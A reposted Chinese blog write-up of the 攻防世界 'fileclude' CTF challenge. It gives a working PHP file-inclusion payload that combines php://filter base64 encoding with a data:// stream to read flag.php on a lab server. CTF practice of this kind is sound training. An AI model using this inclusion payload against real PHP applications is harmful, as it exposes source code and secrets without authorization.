overfit同步小助手

2023-10-23 04:06:45

攻防世界-fileclude

场景

在这里插入图片描述
阅读代码后知道存在flag.php，那么flag相关信息肯定就在flag.php中了。但是直接访问flag.php得到的信息只有：

那么显然易见的就是要配合include(&file)包含用php://filter编码读取flag.php的数据了。同时要满足file_get_contents($file2) === "hello ctf"这一条件。

关于file1

?file1=php://filter/read=convert.base64-encode/resource=flag.php

关于file2

file_get_contents是将文件中数据提取为字符串的函数，它与inclue()一样参数为文件名，所以直接file2=hello%20ctf行不通，要用data://协议构造数据流，使它当作php文件。
?file2=data://text,plain,hello ctf

payload

http://61.147.171.105:55273/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctf

拿到文件数据的base64
在这里插入图片描述
解码拿到flag

标签：网络安全

本文转载自: https://blog.csdn.net/m0_59057526/article/details/126747831
版权归原作者 m0_59057526 所有，如有侵权，请联系我们删除。

发表评论

登录后发布评论

“攻防世界-fileclude”的评论:

还没有评论

关于作者

overfit同步小助手

文章同步

相关阅读

泷羽sec-安全见闻（2）

基于java的实验室安全考试系统设计与实现

Linux sed命令详解

网络：IP分片和组装

若依vue版前端白名单处理

Node.js 全栈开发进阶篇

【AIGC】ChatGPT提示词Prompt高效编写技巧：逆向拆解OpenAI官方提示词

文章导航